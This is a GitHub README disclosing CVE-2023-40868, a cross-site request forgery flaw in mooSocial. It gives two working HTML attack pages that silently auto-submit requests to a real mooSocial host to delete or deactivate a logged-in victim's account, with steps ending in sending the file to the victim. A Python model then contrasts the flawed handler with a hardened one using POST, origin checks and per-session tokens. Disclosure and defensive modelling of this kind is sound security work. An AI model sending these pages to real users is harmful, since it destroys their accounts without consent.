CVE-2023-40868: GitHub - MinoTauro2020/CVE-2023-40868: Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Dea
# CVE-2023-40868
Cross Site Request Forgery vulnerability in mooSocial MooSocial Software v.Demo allows a remote attacker to execute arbitrary code via the Delete Account and Deactivate functions.
The vulnerability is a Cross-Site Request Forgery (CSRF) in the mooSocial MooSocial Software v.Demo application. CSRF occurs when an attacker can make a victim's browser perform a state-changing action that the victim did not intend. Here the attacker sends the victim a crafted HTML page (or a link to one) that automatically submits a request to the `/users/delete_account` or `/users/deactivate` endpoint. Because the victim's browser attaches the existing mooSocial session cookie to that request and the endpoints accept it without any anti-CSRF check (no token, no origin check, and a plain GET is enough), the victim's account is deleted or deactivated without their consent. The attacker-controlled script only runs in the attacker's page; the demonstrated impact on the server is account deletion or deactivation.
## POC
1 - Create a file with this code and save it as HTML (attack: delete account):

```html
<html>
  <body>
    <!-- No method attribute: the browser sends a GET, which the vulnerable endpoint accepts -->
    <form action="https://socialcommerce.moosocial.com/users/delete_account">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Rewrite the visible URL, then submit the form without any click
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

OR create a file with this code and save it as HTML (attack: deactivate account):

```html
<html>
  <body>
    <!-- Same forged request, aimed at the deactivate endpoint -->
    <form action="https://socialcommerce.moosocial.com/users/deactivate">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

2 - Example: test.html
3 - Send it to the victim.
4 - When the victim opens test.html, it loads in their browser and the script submits the form immediately (pressing the button sends the same request). Because the browser attaches the victim's current mooSocial session cookie to the request, the delete or deactivate action is carried out in the victim's own session.
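The procedure above works because the two endpoints honour any request that arrives with the victim's session cookie. The following Python model, added here as an illustration and not part of this repository or of mooSocial, replays the PoC request (and a POST variant served from an attacker-hosted page) against a handler with that flaw and against a hardened one that requires POST, a same-site `Origin`/`Referer` header and a per-session token. The `Request` and `Session` structures, the `csrf_token` form field name, the `https://attacker.example` origin and the in-memory account table are assumptions made for the example; only the two endpoint paths and the target host come from the PoC.

```python
"""Model of the CSRF flaw behind the PoC above, beside a hardened handler.

Added example, not mooSocial's code: request/session shapes, the `csrf_token`
field name, the attacker origin and the account table are assumptions.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional
from urllib.parse import urlparse

SITE_ORIGIN = "https://socialcommerce.moosocial.com"   # target host used in the PoC
ACTIONS = {"/users/delete_account": "delete", "/users/deactivate": "deactivate"}


@dataclass
class Session:
    user_id: int
    csrf_secret: str = field(default_factory=lambda: secrets.token_hex(32))


@dataclass
class Request:
    method: str
    path: str
    session: Optional[Session]            # set when the browser attached the session cookie
    headers: Dict[str, str] = field(default_factory=dict)
    form: Dict[str, str] = field(default_factory=dict)


def csrf_token(session: Session, path: str) -> str:
    """Synchronizer token: bound to the session secret and the action path,
    rendered into the site's own form, unreadable from a foreign origin."""
    return hmac.new(session.csrf_secret.encode(), path.encode(), hashlib.sha256).hexdigest()


def _apply(action: str, user_id: int, accounts: Dict[int, str]) -> str:
    if action == "delete":
        accounts.pop(user_id, None)
        return "200 account deleted"
    accounts[user_id] = "deactivated"
    return "200 account deactivated"


def vulnerable_handler(req: Request, accounts: Dict[int, str]) -> str:
    """Mirrors the flaw: any request with a valid session cookie is honoured,
    whatever its method, origin or form contents."""
    if req.session is None:
        return "401 login required"
    return _apply(ACTIONS[req.path], req.session.user_id, accounts)


def hardened_handler(req: Request, accounts: Dict[int, str]) -> str:
    """Three independent checks; a forged request fails the first one it meets."""
    if req.session is None:
        return "401 login required"
    if req.method != "POST":                      # state changes never on GET
        return "405 method not allowed"
    origin = req.headers.get("Origin") or req.headers.get("Referer")
    if not origin:                                # browsers set these; page scripts cannot forge them
        return "403 missing origin"
    o = urlparse(origin)
    if f"{o.scheme}://{o.netloc}" != SITE_ORIGIN:
        return "403 cross-site request"
    expected = csrf_token(req.session, req.path)
    if not hmac.compare_digest(req.form.get("csrf_token", ""), expected):
        return "403 bad csrf token"
    return _apply(ACTIONS[req.path], req.session.user_id, accounts)


def poc_request(session: Session, path: str) -> Request:
    """What the PoC page sends: a GET (the form has no method attribute) with the
    victim's cookie attached; a local file:// page sends neither Origin nor Referer."""
    return Request("GET", path, session)


def hosted_post_variant(session: Session, path: str) -> Request:
    """Same attack from a page on an attacker-controlled origin (assumed name)
    using a POST form: the browser now sends Origin, but a foreign one."""
    return Request("POST", path, session, headers={"Origin": "https://attacker.example"})


def legitimate_request(session: Session, path: str) -> Request:
    """The site's own form: POST, same origin, token rendered into the form."""
    return Request("POST", path, session, headers={"Origin": SITE_ORIGIN},
                   form={"csrf_token": csrf_token(session, path)})


def run_demo() -> Dict[str, str]:
    """Replays each request against both handlers on a fresh victim account."""
    out = {}
    for name, handler in (("vulnerable", vulnerable_handler), ("hardened", hardened_handler)):
        for label, build in (("poc_get", poc_request), ("hosted_post", hosted_post_variant),
                             ("legitimate", legitimate_request)):
            sess = Session(user_id=7)
            accounts = {7: "active"}              # constructed victim account
            out[f"{name}/{label}"] = handler(build(sess, "/users/delete_account"), accounts)
    return out


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(f"{k:24} -> {v}")
```

The token check is the one that matters: the method and origin checks stop the PoC as written, but the per-session token is what blocks a forged request that manages to look same-site, and `hmac.compare_digest` keeps the comparison constant-time.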